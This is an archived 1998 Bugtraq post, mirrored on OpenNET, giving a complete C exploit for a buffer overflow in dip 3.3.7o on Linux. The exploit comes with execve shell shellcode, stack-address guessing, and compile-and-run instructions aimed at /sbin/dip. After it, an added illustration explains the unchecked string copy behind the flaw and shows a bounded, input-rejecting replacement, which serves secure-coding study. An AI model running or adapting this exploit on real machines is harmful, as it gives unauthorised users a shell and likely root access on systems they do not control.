The OpenNET Project / Index page
dip 3.3.7 exploit


X-RDate: Sun, 10 May 1998 16:45:09 +0600 (YEKST)
X-UIDL: 35317d34000001e7
Date: Thu, 7 May 1998 20:06:47 +0000
From: jamez <jamez@UGROUND.ORG>
To: BUGTRAQ@NETSPACE.ORG
Subject: dip 3.3.7 exploit

Here is an exploit for the dip 3.3.7o buffer overflow.

----- cut here -----
/*
  dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998)
  coded by jamez. e-mail: jamez@uground.org

  thanks to all ppl from uground.

  usage:
     gcc -o dip-exp dip3.3.7o-exp.c
     ./dip-exp offset (-100 to 100. probably 0. tested on slack 3.4)
*/

#include <stdlib.h>     /* atoi */
#include <string.h>     /* strlen */
#include <unistd.h>     /* execl */

/* Linux/x86 execve("/bin/sh") shellcode followed by an exit() syscall. */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define SIZE 130
/* cause it's a little buffer, i wont use NOP's */

char buffer[SIZE];

/* Current stack pointer, used as the base for guessing where the
   payload lands in dip's stack. x86-only, like the shellcode. */
unsigned long get_esp(void) {
   unsigned long esp;
   __asm__("movl %%esp,%0" : "=r"(esp));
   return esp;
}

int main(int argc, char * argv[])
{
  int i = 0,
      offset = 0;
  long addr;

  if(argc > 1) offset = atoi(argv[1]);

  addr = get_esp() - offset - 0xcb;

  /* Payload layout: the shellcode first, then the remainder of the
     buffer filled with the guessed address in little-endian order. */
  for(i = 0; i < strlen(shellcode); i++)
     buffer[i] = shellcode[i];

  /* i + 3 < SIZE keeps every 4-byte store inside buffer[]. */
  for (; i + 3 < SIZE; i += 4)
  {
     buffer[i  ] =  addr & 0x000000ff;
     buffer[i+1] = (addr & 0x0000ff00) >> 8;
     buffer[i+2] = (addr & 0x00ff0000) >> 16;
     buffer[i+3] = (addr & 0xff000000) >> 24;
  }

  buffer[SIZE - 1] = 0;   /* NUL-terminate so it passes as a C string */

  execl("/sbin/dip", "dip", "-k", "-l", buffer, (char *)0);
  return 1;               /* only reached if execl() failed */
}
----- cut here -----


--
jamez@uground.org
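Added illustration, not part of jamez's post and not dip's own source (which the post does not include): the defect this exploit relies on is a command-line argument copied into a fixed-size stack buffer with no length check. Whether dip 3.3.7o's -l handler looked exactly like the first function below is an assumption; the buffer size LINE_LEN is a constructed value. The contrast that matters is between the unbounded copy and a bounded one that measures the argument first and rejects anything that does not fit, instead of writing past the end of the buffer.

```c
#include <stdio.h>
#include <string.h>

/* Constructed size for the illustration; dip's real buffer size
 * is not given in the post. */
#define LINE_LEN 64

/* Shape of the bug: the argument is copied into a fixed stack buffer
 * with no bound, so an argument of LINE_LEN bytes or more overwrites
 * whatever follows the buffer on the stack, saved return address
 * included. Only ever called on short input here. */
static int set_line_unchecked(const char *arg)
{
    char line[LINE_LEN];
    strcpy(line, arg);              /* overflows if strlen(arg) >= LINE_LEN */
    return (int)strlen(line);
}

/* Hardened form: look for the terminator within the first LINE_LEN
 * bytes only, refuse the argument if it is not there, and copy with
 * an explicit bound. Returns the copied length, or -1 if rejected. */
static int set_line_checked(const char *arg)
{
    char line[LINE_LEN];
    const char *end = memchr(arg, '\0', LINE_LEN);   /* never scans past LINE_LEN */
    if (end == NULL)
        return -1;                  /* too long for the buffer: reject, do not truncate silently */
    size_t n = (size_t)(end - arg); /* n <= LINE_LEN - 1, so n + 1 fits */
    memcpy(line, arg, n + 1);       /* copies the terminating NUL as well */
    return (int)n;
}

/* Builds a constructed argument of `len` filler bytes (like the
 * payload-sized string the exploit above passes) and runs it through
 * the checked copy. Caps len so the scratch buffer cannot overflow. */
static int checked_result_for_len(size_t len)
{
    char arg[256];
    if (len > sizeof(arg) - 1)
        len = sizeof(arg) - 1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    return set_line_checked(arg);
}

int main(void)
{
    /* 130 bytes is the exploit's SIZE; the checked copy refuses it. */
    printf("130-byte argument -> %d\n", checked_result_for_len(130));
    printf("63-byte argument  -> %d\n", checked_result_for_len(63));
    printf("64-byte argument  -> %d\n", checked_result_for_len(64));
    printf("unchecked copy of short argument -> %d\n", set_line_unchecked("ppp0"));
    return 0;
}
```

Rejecting rather than truncating is the deliberate choice: a silently shortened line would still run dip with an argument the caller did not ask for, while a refusal surfaces the bad input where it can be logged.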
